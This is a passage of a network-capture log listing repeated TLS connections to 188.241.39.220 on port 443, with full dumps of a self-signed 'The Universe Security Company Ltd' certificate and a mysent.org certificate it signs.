Jun 19, 2018 13:45:46.606036901 MESZ	443	49169	188.241.39.220	192.168.1.81	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Tue Mar 17 15:16:38 CET 2015	Thu Mar 09 15:16:38 CET 2045	[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]
Jun 19, 2018 13:46:48.023648977 MESZ	443	49216	188.241.39.220	192.168.1.81	CN=mysent.org	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Mon Jun 18 13:45:26 CEST 2018	Tue Jun 18 13:45:26 CEST 2019	[[ Version: V3 Subject: CN=mysent.org Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 142020255779474466437467796904587070192603484135849864218396671432172669171382101147506485794532471675983194620816678789045464137277686040346151440959121771884847900060007644867320878394553783339343758343135223291298085891647948350326926758635437768025453782370586416571958435585772964422012691370552485683107 public exponent: 3 Validity: [From: Mon Jun 18 13:45:26 CEST 2018, To: Tue Jun 18 13:45:26 CEST 2019] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ 6d600d30 8e6e07f7 682b6b12 4c42ab40]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: mysent.org][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 5A 89 04 CE 12 04 DE C7 1A B6 37 7E 0B 52 41 EA Z.........7..RA.0010: D0 D3 87 A7 ....]]] Algorithm: [SHA1withRSA] Signature:0000: 34 C7 4A 88 4C 24 5D 55 3C 06 A7 18 76 FB B2 E6 4.J.L$]U<...v...0010: 3E 18 40 EE 23 26 4B 75 33 21 CD 5C EA 0D 57 47 >.@.#&Ku3!.\..WG0020: D5 14 4B 4F BE 04 73 8C D1 5A 70 3E D6 D1 D5 FD ..KO..s..Zp>....0030: 7E ED 32 14 2E 21 36 23 DF 41 79 06 64 A4 2F 1D ..2..!6#.Ay.d./.0040: 41 0F A1 42 18 B2 74 26 70 BF 4B 6C F4 B8 B9 24 A..B..t&p.Kl...$0050: 7E 8C FB 80 08 19 3F EF 07 0C A9 CF 35 86 47 63 ......?.....5.Gc0060: DB EB 11 8B 31 72 D9 6F 28 59 62 A5 B1 CB B5 9D ....1r.o(Yb.....0070: 11 DB 34 1F A9 25 DB 9F 6F 3E 84 A7 4E 12 C7 CF ..4..%..o>..N...0080: 57 B4 D2 AB B1 58 98 7A 35 9C 4C 20 94 ED 9D 42 W....X.z5.L ...B0090: D9 DE DD FA BE 7E 65 C7 F1 69 A4 27 AE 0F 77 87 ......e..i.'..w.00A0: C1 77 D5 87 A3 49 02 D0 B2 C8 99 80 FB 58 5C 21 .w...I.......X\!00B0: 68 2A 01 7A 8D D5 70 AD 90 4D 98 EC C4 08 EF 5A h.z..p..M.....Z00C0: 96 4B 4D 43 D9 2E 76 9D 57 9B B0 E2 ED 28 50 D2 .KMC..v.W....(P.00D0: 67 42 3F FA 4C D0 AF BD 3F 27 BB C0 37 8A 9C 05 gB?.L...?'..7...00E0: 92 E9 9C F7 FE ED 52 AE 1A CA 53 32 8E BC 12 97 ......R...S2....00F0: 98 AC 6F 63 EC 09 0C 28 3D 83 CB 76 D7 92 85 30 ..oc...(=..v...00100: B0 F8 36 E7 0D 31 CC F1 E7 F2 6C 8F EE 8D F7 A0 ..6..1....l.....0110: 49 C4 83 1B 7A 27 B2 DC 32 3C B1 8F 66 BC BB 4F I...z'..2<..f..O0120: 35 3A 65 7D CE FD C6 95 5B A0 B9 63 41 3C 84 6E 5:e.....[..cA<.n0130: 59 6D A4 D3 E0 EF C1 77 F8 4A BA CA DF 65 BD FE Ym.....w.J...e..0140: C5 2A 1D 69 38 94 02 D6 B5 74 B6 3C 5F 7B 24 30 ..i8....t.<_.$00150: 2F B9 35 83 DC C8 27 52 7A DC 47 C0 01 97 BE 33 /.5...'Rz.G....30160: 60 F6 F4 3C 1D 61 49 D8 70 D3 01 2B 36 16 7B C3 `..<.aI.p..+6...0170: F1 B1 29 A8 AF 44 5A C2 B5 34 B1 20 E7 45 DE EC ..)..DZ..4. .E..0180: 0B 92 70 CE F0 A0 3B 96 C4 D7 A7 4A 81 13 FA 51 ..p...;....J...Q0190: 97 DC 7F B7 5C 4F 38 89 2A CB EF 71 64 29 23 D8 ....\O8.*..qd)#.01A0: 68 FC 51 11 A8 95 3B 00 60 96 70 D0 37 57 EC 3D h.Q...;.`.p.7W.=01B0: 00 48 14 96 DC 1B BF 59 7D 79 C0 27 38 35 FA F1 .H.....Y.y.'85..01C0: D3 2D 08 6F 24 3E F6 1E 7B C1 83 88 64 42 80 0F .-.o$>......dB..01D0: 43 EE 26 1E A5 3C A6 38 07 EA 0C 04 0D 82 A1 72 C.&..<.8.......r01E0: F3 2F DF EA D5 4D BB 82 0A FE 10 88 24 DA 86 6A ./...M......$..j01F0: 4D 0F A0 E0 BF E4 11 DC C1 8B C4 18 1A 10 88 AE M...............]
Jun 19, 2018 13:46:48.023648977 MESZ	443	49216	188.241.39.220	192.168.1.81	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Tue Mar 17 15:16:38 CET 2015	Thu Mar 09 15:16:38 CET 2045	[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]
Jun 19, 2018 13:46:49.356630087 MESZ	443	49218	188.241.39.220	192.168.1.81	CN=mysent.org	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Mon Jun 18 13:45:26 CEST 2018	Tue Jun 18 13:45:26 CEST 2019	[[ Version: V3 Subject: CN=mysent.org Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 142020255779474466437467796904587070192603484135849864218396671432172669171382101147506485794532471675983194620816678789045464137277686040346151440959121771884847900060007644867320878394553783339343758343135223291298085891647948350326926758635437768025453782370586416571958435585772964422012691370552485683107 public exponent: 3 Validity: [From: Mon Jun 18 13:45:26 CEST 2018, To: Tue Jun 18 13:45:26 CEST 2019] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ 6d600d30 8e6e07f7 682b6b12 4c42ab40]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: mysent.org][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 5A 89 04 CE 12 04 DE C7 1A B6 37 7E 0B 52 41 EA Z.........7..RA.0010: D0 D3 87 A7 ....]]] Algorithm: [SHA1withRSA] Signature:0000: 34 C7 4A 88 4C 24 5D 55 3C 06 A7 18 76 FB B2 E6 4.J.L$]U<...v...0010: 3E 18 40 EE 23 26 4B 75 33 21 CD 5C EA 0D 57 47 >.@.#&Ku3!.\..WG0020: D5 14 4B 4F BE 04 73 8C D1 5A 70 3E D6 D1 D5 FD ..KO..s..Zp>....0030: 7E ED 32 14 2E 21 36 23 DF 41 79 06 64 A4 2F 1D ..2..!6#.Ay.d./.0040: 41 0F A1 42 18 B2 74 26 70 BF 4B 6C F4 B8 B9 24 A..B..t&p.Kl...$0050: 7E 8C FB 80 08 19 3F EF 07 0C A9 CF 35 86 47 63 ......?.....5.Gc0060: DB EB 11 8B 31 72 D9 6F 28 59 62 A5 B1 CB B5 9D ....1r.o(Yb.....0070: 11 DB 34 1F A9 25 DB 9F 6F 3E 84 A7 4E 12 C7 CF ..4..%..o>..N...0080: 57 B4 D2 AB B1 58 98 7A 35 9C 4C 20 94 ED 9D 42 W....X.z5.L ...B0090: D9 DE DD FA BE 7E 65 C7 F1 69 A4 27 AE 0F 77 87 ......e..i.'..w.00A0: C1 77 D5 87 A3 49 02 D0 B2 C8 99 80 FB 58 5C 21 .w...I.......X\!00B0: 68 2A 01 7A 8D D5 70 AD 90 4D 98 EC C4 08 EF 5A h.z..p..M.....Z00C0: 96 4B 4D 43 D9 2E 76 9D 57 9B B0 E2 ED 28 50 D2 .KMC..v.W....(P.00D0: 67 42 3F FA 4C D0 AF BD 3F 27 BB C0 37 8A 9C 05 gB?.L...?'..7...00E0: 92 E9 9C F7 FE ED 52 AE 1A CA 53 32 8E BC 12 97 ......R...S2....00F0: 98 AC 6F 63 EC 09 0C 28 3D 83 CB 76 D7 92 85 30 ..oc...(=..v...00100: B0 F8 36 E7 0D 31 CC F1 E7 F2 6C 8F EE 8D F7 A0 ..6..1....l.....0110: 49 C4 83 1B 7A 27 B2 DC 32 3C B1 8F 66 BC BB 4F I...z'..2<..f..O0120: 35 3A 65 7D CE FD C6 95 5B A0 B9 63 41 3C 84 6E 5:e.....[..cA<.n0130: 59 6D A4 D3 E0 EF C1 77 F8 4A BA CA DF 65 BD FE Ym.....w.J...e..0140: C5 2A 1D 69 38 94 02 D6 B5 74 B6 3C 5F 7B 24 30 ..i8....t.<_.$00150: 2F B9 35 83 DC C8 27 52 7A DC 47 C0 01 97 BE 33 /.5...'Rz.G....30160: 60 F6 F4 3C 1D 61 49 D8 70 D3 01 2B 36 16 7B C3 `..<.aI.p..+6...0170: F1 B1 29 A8 AF 44 5A C2 B5 34 B1 20 E7 45 DE EC ..)..DZ..4. .E..0180: 0B 92 70 CE F0 A0 3B 96 C4 D7 A7 4A 81 13 FA 51 ..p...;....J...Q0190: 97 DC 7F B7 5C 4F 38 89 2A CB EF 71 64 29 23 D8 ....\O8.*..qd)#.01A0: 68 FC 51 11 A8 95 3B 00 60 96 70 D0 37 57 EC 3D h.Q...;.`.p.7W.=01B0: 00 48 14 96 DC 1B BF 59 7D 79 C0 27 38 35 FA F1 .H.....Y.y.'85..01C0: D3 2D 08 6F 24 3E F6 1E 7B C1 83 88 64 42 80 0F .-.o$>......dB..01D0: 43 EE 26 1E A5 3C A6 38 07 EA 0C 04 0D 82 A1 72 C.&..<.8.......r01E0: F3 2F DF EA D5 4D BB 82 0A FE 10 88 24 DA 86 6A ./...M......$..j01F0: 4D 0F A0 E0 BF E4 11 DC C1 8B C4 18 1A 10 88 AE M...............]
Jun 19, 2018 13:46:49.356630087 MESZ	443	49218	188.241.39.220	192.168.1.81	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Tue Mar 17 15:16:38 CET 2015	Thu Mar 09 15:16:38 CET 2045	[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]
Jun 19, 2018 13:47:13.360089064 MESZ	443	49242	188.241.39.220	192.168.1.81	CN=mysent.org	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Mon Jun 18 13:45:26 CEST 2018	Tue Jun 18 13:45:26 CEST 2019	[[ Version: V3 Subject: CN=mysent.org Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 142020255779474466437467796904587070192603484135849864218396671432172669171382101147506485794532471675983194620816678789045464137277686040346151440959121771884847900060007644867320878394553783339343758343135223291298085891647948350326926758635437768025453782370586416571958435585772964422012691370552485683107 public exponent: 3 Validity: [From: Mon Jun 18 13:45:26 CEST 2018, To: Tue Jun 18 13:45:26 CEST 2019] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ 6d600d30 8e6e07f7 682b6b12 4c42ab40]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: 